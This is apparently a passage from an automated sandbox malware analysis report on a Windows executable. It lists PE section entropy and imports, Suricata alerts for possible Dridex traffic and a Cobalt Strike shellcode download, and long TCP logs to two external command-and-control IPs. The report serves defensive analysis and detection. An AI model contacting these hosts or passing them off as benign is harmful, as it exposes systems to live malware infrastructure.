/78	0x40c000	0x42b34	0x42c00	97c14c3bfb584585517081c1fc4087fc	False	0.9962546816479401	data	7.992184842908324	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90	0x44f000	0x15fc7	0x16000	2ee15ab12252bf9d6046c8d0b26a6b96	False	0.9755637428977273	data	7.797240255313336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x465000	0x53e	0x600	830a83365f44e4a95a3600e48f699567	False	0.3743489583333333	OpenPGP Public Key	3.9411322449246575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x466000	0x6a70	0x6c00	9e399d4e418337896ade4660adcfb3d3	False	0.2893880208333333	data	5.406112735735817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x46d000	0x2ebf4	0x2ec00	1ffd34108f8898b7e1b1d36c5941068f	False	0.2423285010026738	data	5.188195276507059	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T11:35:59.196677+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49731	47.90.135.102	443	TCP
2024-12-28T11:35:59.929737+0100	2035442	ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1	1	47.90.135.102	443	192.168.2.4	49731	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 11:35:57.697926044 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:57.698004961 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:57.698092937 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:57.712850094 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:57.712876081 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.196415901 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.196676970 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.252680063 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.252741098 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.252984047 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.253051996 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.255776882 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.299335003 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.638058901 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.638277054 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.652833939 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.652842045 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.652928114 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.652954102 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.653012991 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.719568014 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.719649076 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.719671965 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.719727993 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.851551056 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.851650000 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.851671934 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.851728916 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.883997917 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.884097099 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.884115934 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.884169102 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.906394958 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.906471968 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.906498909 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.906555891 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.929747105 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.929817915 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:35:59.929831028 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:35:59.929881096 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.046293974 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.046372890 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.046389103 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.046437979 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.060839891 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.060909986 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.060921907 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.060973883 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.077441931 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.077518940 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.077531099 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.077572107 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.091912031 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.091983080 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.092015982 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.092068911 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.104186058 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.104254007 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.104288101 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.104299068 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.104368925 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.120419025 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.120515108 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.120527983 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.120583057 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.133425951 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.133497953 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.133510113 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.133562088 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.146328926 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.146399975 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.146429062 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.146481037 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.247379065 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.247468948 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.247482061 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.247534037 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.258446932 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.258522034 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.258533001 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.258582115 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.272972107 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.273088932 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.273099899 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.273163080 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.284060955 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.284135103 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.284152985 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.284204006 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.290998936 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.291069984 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.291081905 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.291134119 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.297288895 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.297359943 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.297372103 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.297430992 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.302434921 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.302504063 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.302515030 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.302582979 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.307202101 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.307271004 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.307281971 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.307348967 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.313518047 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.313585043 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.313596010 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.313760996 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.319191933 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.319272041 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.319283009 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.319345951 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.324238062 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.324353933 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.324364901 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.324407101 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.330310106 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.330399990 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.330410957 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.330463886 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.443531036 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.443614960 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.443629026 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.443682909 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.448544979 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.448633909 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.448647022 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.448719978 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.453212976 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.453279018 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.453290939 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.453346014 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.459682941 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.459763050 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.459774971 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.459841967 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.464639902 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.464716911 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.464729071 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.464787006 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.471159935 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.471231937 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.471244097 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.471295118 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.475805044 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.475897074 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.475908041 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.475961924 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.480880976 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.480973959 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.480984926 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.481044054 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.486500978 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.486587048 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.486603975 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.486664057 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.489492893 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.489563942 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.489576101 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.489625931 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.490044117 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.490122080 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.490128994 CET	443	49731	47.90.135.102	192.168.2.4
Dec 28, 2024 11:36:00.490190983 CET	49731	443	192.168.2.4	47.90.135.102
Dec 28, 2024 11:36:00.907694101 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:00.907737970 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:00.907810926 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:00.908118010 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:00.908133984 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.220514059 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.220632076 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.358609915 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.358674049 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.359076023 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.359339952 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.359504938 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.407331944 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.752151012 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.752218008 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.752243996 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.752310991 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.753284931 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.753326893 CET	443	49732	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.753355026 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.753400087 CET	49732	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.881724119 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.881774902 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:02.881866932 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.882159948 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:02.882175922 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.141447067 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.141522884 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.142297029 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.142306089 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.143553019 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.143558025 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.890795946 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.890872955 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.890997887 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.890997887 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.915294886 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.915321112 CET	443	49733	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:04.915332079 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:04.915370941 CET	49733	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:05.184357882 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:05.184453011 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:05.184533119 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:05.185300112 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:05.185334921 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.442688942 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.442904949 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.443861008 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.443871975 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.444966078 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.444971085 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.939238071 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.939291954 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.939296007 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.939344883 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.939440012 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.939457893 CET	443	49734	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:06.939491987 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:06.939501047 CET	49734	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:07.053581953 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:07.053622007 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:07.053771019 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:07.054078102 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:07.054092884 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.312180042 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.312362909 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.313079119 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.313088894 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.314364910 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.314369917 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.814752102 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.814821005 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.814923048 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.814923048 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.814980984 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.814992905 CET	443	49735	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.815013885 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.815041065 CET	49735	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.928915024 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.928956032 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:08.929064989 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.929425955 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:08.929445028 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:10.187323093 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:10.187371969 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:10.187947989 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:10.187956095 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:10.189522982 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:10.189527035 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:11.043273926 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:11.043353081 CET	443	49736	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:11.043359995 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.043529987 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.043529987 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.043554068 CET	49736	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.164032936 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.164123058 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:11.164203882 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.164480925 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:11.164514065 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.423526049 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.423602104 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.424536943 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.424565077 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.425668955 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.425697088 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.918211937 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.918277979 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.918302059 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.918361902 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.918406963 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.918446064 CET	443	49737	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:12.918469906 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:12.918498039 CET	49737	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:13.039618969 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:13.039659023 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:13.039722919 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:13.039938927 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:13.039952993 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.254173994 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.254255056 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.254817963 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.254826069 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.256356001 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.256361961 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.744491100 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.744565010 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.744579077 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.744632006 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.744649887 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.744703054 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.745438099 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.745438099 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.745450020 CET	443	49738	104.21.34.5	192.168.2.4
Dec 28, 2024 11:36:14.745570898 CET	49738	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:36:14.897847891 CET	49740	443	192.168.2.4	104.21.34.5
